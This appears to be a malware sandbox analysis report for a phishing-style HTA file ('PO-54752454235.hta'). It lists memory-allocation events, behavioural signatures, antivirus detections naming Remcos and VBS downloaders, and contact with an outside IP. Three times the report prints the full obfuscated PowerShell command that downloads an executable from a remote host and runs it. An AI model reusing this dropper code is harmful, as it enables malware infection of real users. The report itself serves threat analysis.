NtAllocateVirtualMemory Nov. 11, 2024, 10:05 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02596000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:05 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02597000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:05 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02598000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:05 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02599000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:05 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e10000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:05 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e11000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:05 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e12000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:05 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e13000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:05 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e14000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:05 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e15000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:05 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e16000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:05 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e17000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:05 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e18000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:05 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e19000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:05 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e1a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:05 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e1b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:05 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e1c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:05 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e1d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:05 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e1e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:05 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e1f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:05 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:05 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e21000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:05 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e22000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:05 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e23000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Nov. 11, 2024, 10:05 a.m.	process_identifier: 2080 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04e24000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Creates a suspicious process (2 events)

cmdline

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function DZzrEhDP($Jz, $G){[IO.File]::WriteAllBytes($Jz, $G)};function cVPGqauI($Jz){if($Jz.EndsWith((KMIhcrUSa @(18407,18461,18469,18469))) -eq $True){Start-Process (KMIhcrUSa @(18475,18478,18471,18461,18469,18469,18412,18411,18407,18462,18481,18462)) $Jz}else{Start-Process $Jz}};function NXvilJfwj($Nd){$gu = New-Object (KMIhcrUSa @(18439,18462,18477,18407,18448,18462,18459,18428,18469,18466,18462,18471,18477));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$G = $gu.DownloadData($Nd);return $G};function KMIhcrUSa($Xj){$Ds=18361;$Q=$Null;foreach($Nt in $Xj){$Q+=[char]($Nt-$Ds)};return $Q};function biUnSvy(){$wGmFaIqRG = $env:APPDATA + '\';$mVsYqYr = NXvilJfwj (KMIhcrUSa @(18465,18477,18477,18473,18419,18408,18408,18410,18417,18414,18407,18410,18418,18415,18407,18410,18410,18407,18410,18414,18410,18408,18466,18461,18467,18458,18408,18481,18436,18477,18483,18479,18461,18430,18472,18429,18426,18467,18437,18470,18479,18439,18407,18462,18481,18462));$JWZIMxNfA = $wGmFaIqRG + 'xKtzvdEoDAjLmvN.exe';DZzrEhDP $JWZIMxNfA $mVsYqYr;cVPGqauI $JWZIMxNfA;;;;}biUnSvy;

cmdline

powershell.exe -ExecutionPolicy UnRestricted function DZzrEhDP($Jz, $G){[IO.File]::WriteAllBytes($Jz, $G)};function cVPGqauI($Jz){if($Jz.EndsWith((KMIhcrUSa @(18407,18461,18469,18469))) -eq $True){Start-Process (KMIhcrUSa @(18475,18478,18471,18461,18469,18469,18412,18411,18407,18462,18481,18462)) $Jz}else{Start-Process $Jz}};function NXvilJfwj($Nd){$gu = New-Object (KMIhcrUSa @(18439,18462,18477,18407,18448,18462,18459,18428,18469,18466,18462,18471,18477));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$G = $gu.DownloadData($Nd);return $G};function KMIhcrUSa($Xj){$Ds=18361;$Q=$Null;foreach($Nt in $Xj){$Q+=[char]($Nt-$Ds)};return $Q};function biUnSvy(){$wGmFaIqRG = $env:APPDATA + '\';$mVsYqYr = NXvilJfwj (KMIhcrUSa @(18465,18477,18477,18473,18419,18408,18408,18410,18417,18414,18407,18410,18418,18415,18407,18410,18410,18407,18410,18414,18410,18408,18466,18461,18467,18458,18408,18481,18436,18477,18483,18479,18461,18430,18472,18429,18426,18467,18437,18470,18479,18439,18407,18462,18481,18462));$JWZIMxNfA = $wGmFaIqRG + 'xKtzvdEoDAjLmvN.exe';DZzrEhDP $JWZIMxNfA $mVsYqYr;cVPGqauI $JWZIMxNfA;;;;}biUnSvy;

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW Nov. 11, 2024, 10:05 a.m.	show_type: 0 filepath_r: powershell.exe parameters: -ExecutionPolicy UnRestricted function DZzrEhDP($Jz, $G){[IO.File]::WriteAllBytes($Jz, $G)};function cVPGqauI($Jz){if($Jz.EndsWith((KMIhcrUSa @(18407,18461,18469,18469))) -eq $True){Start-Process (KMIhcrUSa @(18475,18478,18471,18461,18469,18469,18412,18411,18407,18462,18481,18462)) $Jz}else{Start-Process $Jz}};function NXvilJfwj($Nd){$gu = New-Object (KMIhcrUSa @(18439,18462,18477,18407,18448,18462,18459,18428,18469,18466,18462,18471,18477));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$G = $gu.DownloadData($Nd);return $G};function KMIhcrUSa($Xj){$Ds=18361;$Q=$Null;foreach($Nt in $Xj){$Q+=[char]($Nt-$Ds)};return $Q};function biUnSvy(){$wGmFaIqRG = $env:APPDATA + '\';$mVsYqYr = NXvilJfwj (KMIhcrUSa @(18465,18477,18477,18473,18419,18408,18408,18410,18417,18414,18407,18410,18418,18415,18407,18410,18410,18407,18410,18414,18410,18408,18466,18461,18467,18458,18408,18481,18436,18477,18483,18479,18461,18430,18472,18429,18426,18467,18437,18470,18479,18439,18407,18462,18481,18462));$JWZIMxNfA = $wGmFaIqRG + 'xKtzvdEoDAjLmvN.exe';DZzrEhDP $JWZIMxNfA $mVsYqYr;cVPGqauI $JWZIMxNfA;;;;}biUnSvy; filepath: powershell.exe	1	1	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Nov. 11, 2024, 10:05 a.m.	flags: 15 family: 0		111	0

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Nov. 11, 2024, 10:05 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Communicates with host for which no DNS query was performed (1 event)

host

185.196.11.151

One or more non-whitelisted processes were created (1 event)

parent_process

powershell.exe

martian_process

C:\Users\test22\AppData\Roaming\xKtzvdEoDAjLmvN.exe

Creates a suspicious Powershell process (2 events)

option	-executionpolicy unrestricted				value	Attempts to bypass execution policy
option	-executionpolicy unrestricted				value	Attempts to bypass execution policy

File has been identified by 28 AntiVirus engines on VirusTotal as malicious (28 events)

CTX	html.trojan.generic
Skyhigh	VBS/Downloader.acl
Arcabit	Trojan.Generic.D473765C
Symantec	Scr.Malscript!gen11
ESET-NOD32	VBS/TrojanDownloader.Agent.XAO
TrendMicro-HouseCall	Trojan.HTML.REMCOS.YXEKFZ
Avast	Script:SNH-gen [Trj]
Kaspersky	HEUR:Trojan.Script.Generic
BitDefender	Trojan.GenericKD.74675804
NANO-Antivirus	Trojan.Script.Downloader.jpdglv
MicroWorld-eScan	Trojan.GenericKD.74675804
Emsisoft	Trojan.GenericKD.74675804 (B)
DrWeb	Trojan.DownLoader47.49759
TrendMicro	Trojan.HTML.REMCOS.YXEKFZ
Ikarus	Trojan-Downloader.VBS.Agent
FireEye	Trojan.GenericKD.74675804
Jiangmin	Trojan.Script.amhb
Google	Detected
Kingsoft	hta.Troj.2024093
Gridinsoft	Trojan.U.Remcos.tr
Microsoft	Trojan:Script/Wacatac.B!ml
GData	HTML.Trojan.Agent.5ZB2M3
Varist	VBS/Agent.AZR!Eldorado
McAfee	VBS/Downloader.acl
Tencent	Vbs.Trojan-Downloader.Der.Ssmw
huorong	TrojanDownloader/VBS.Maloader.n
Fortinet	VBS/Agent.UQJ!tr
AVG	Script:SNH-gen [Trj]

Connects to an IP address that is no longer responding to requests (legitimate services will remain up-and-running usually) (1 event)

dead_host

185.196.11.151:80

PO-54752454235.hta

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All